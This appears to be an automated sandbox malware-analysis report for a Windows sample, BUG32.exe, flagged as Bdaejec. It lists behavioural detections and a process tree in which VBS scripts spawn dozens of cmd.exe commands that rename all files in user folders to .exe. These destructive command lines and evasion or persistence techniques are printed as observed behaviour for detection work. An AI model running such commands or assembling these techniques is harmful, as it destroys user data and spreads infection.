Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
BUG32.exe

Overview

General Information

Sample name:BUG32.exe
Analysis ID:1482692
MD5:88de5895931431e3bdd22badc8a5bf01
SHA1:b950579884065095fc5a43a3d3c31533fbf2332a
SHA256:61350356b1968566fb172eb27ac18c916465c585df84c4d70ec5ef4e4fa00f9a
Tags:exe
Infos:

Detection

Bdaejec
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Bdaejec
AI detected suspicious sample
Creates an undocumented autostart registry key
Disable Task Manager(disabletaskmgr)
Disables the Windows registry editor (regedit)
Disables the Windows task manager (taskmgr)
Drops PE files to the document folder of the user
Drops executable to a common third party application directory
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies existing user documents (likely ransomware behavior)
PE file contains section with special chars
Potential malicious VBS script found (suspicious strings)
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Uses known network protocols on non-standard ports
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Windows Shell Script Host drops VBS files
Checks for available system drives (often done to infect USB drives)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Entry point lies outside standard sections
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Potentially Suspicious Desktop Background Change Via Registry
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Too many similar processes found
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Uses the system / local time for branch decision (may execute only at specific dates)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • BUG32.exe (PID: 3160 cmdline: "C:\Users\user\Desktop\BUG32.exe" MD5: 88DE5895931431E3BDD22BADC8A5BF01)
    • aJEWGt.exe (PID: 6164 cmdline: C:\Users\user\AppData\Local\Temp\aJEWGt.exe MD5: F7D21DE5C4E81341ECCD280C11DDCC9A)
      • WerFault.exe (PID: 7596 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6164 -s 1492 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • wscript.exe (PID: 5020 cmdline: "C:\Windows\sysnative\wscript.exe" C:\Users\user\AppData\Local\Temp\CB7D.tmp\CB7E.vbs MD5: A47CBE969EA935BDD3AB568BB126BC80)
      • wscript.exe (PID: 6024 cmdline: "C:\Windows\System32\wscript.exe" "C:\BUG32\admin.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
        • wscript.exe (PID: 6532 cmdline: "C:\Windows\System32\wscript.exe" "C:\bug32\jaq.vbs" RunAsAdministrator MD5: A47CBE969EA935BDD3AB568BB126BC80)
          • wmplayer.exe (PID: 428 cmdline: "C:\Program Files (x86)\Windows Media Player\wmplayer.exe" MD5: A7790328035BBFCF041A6D815F9C28DF)
            • unregmp2.exe (PID: 2888 cmdline: "C:\Windows\System32\unregmp2.exe" /AsyncFirstLogon MD5: 51629AAAF753C6411D0B7D37620B7A83)
              • unregmp2.exe (PID: 7172 cmdline: "C:\Windows\SysNative\unregmp2.exe" /AsyncFirstLogon /REENTRANT MD5: A6FC8CE566DEC7C5873CB9D02D7B874E)
          • cmd.exe (PID: 4284 cmdline: "C:\Windows\System32\cmd.exe" /c dir "C:\Users\user\" /s/b/o:n/a:d > "C:\BUG32\list.lnk" & echo :ok:>>"C:\bug32\list.lnk" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7280 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\.ms-ad\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7288 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7324 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\3D Objects\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7388 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7452 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\Application Data\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7508 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\Contacts\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7564 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\Cookies\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7604 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\Desktop\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7716 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\Documents\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7804 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\Downloads\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7940 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\Favorites\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7996 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\Links\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 8012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 8044 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\Local Settings\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 8056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 8104 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\Music\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 8128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • svchost.exe (PID: 5152 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
          • cmd.exe (PID: 8160 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\My Documents\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 8176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 6024 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\NetHood\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 1272 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\OneDrive\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 2300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7348 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\Pictures\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7636 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\PrintHood\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7580 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\Recent\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7536 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\Saved Games\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7464 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\Searches\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7560 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\SendTo\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7496 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\Start Menu\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7324 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\Templates\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7676 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\Videos\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7740 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7876 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\LocalLow\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7972 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Roaming\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 8068 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Adobe\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 8052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 8124 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 8076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 8056 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\CEF\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 8128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 8188 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Comms\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 1848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7292 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\ConnectedDevicesPlatform\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 1272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7512 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\D3DSCache\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 2072 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Google\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 2284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7444 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\History\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7392 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7456 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Microsoft\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7652 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Mozilla\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7636 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Packages\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7288 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7320 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\PeerDistRepub\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7452 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\PlaceholderTileLogoFolder\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7608 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Publishers\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7724 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\SolidDocuments\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7968 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Temp\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7476 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Temporary Internet Files\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 6656 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\VirtualStore\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7224 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7568 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Adobe\Acrobat\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7240 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7464 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Adobe\AcroCef\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7816 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Adobe\ARM\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 6096 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Adobe\Color\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7616 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Adobe\Acrobat\DC\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7840 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 4708 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7944 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 8184 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 8168 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Adobe\AcroCef\DC\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7236 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7476 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7224 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cookie\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 8120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7568 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\blob_storage\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7240 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7440 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Cache\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 8172 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7344 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 4072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 3836 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Network\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 8064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7896 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 8136 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\blob_storage\336a045b-df12-4067-9f71-93ee2edb038d\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 4164 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Cache\Cache_Data\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
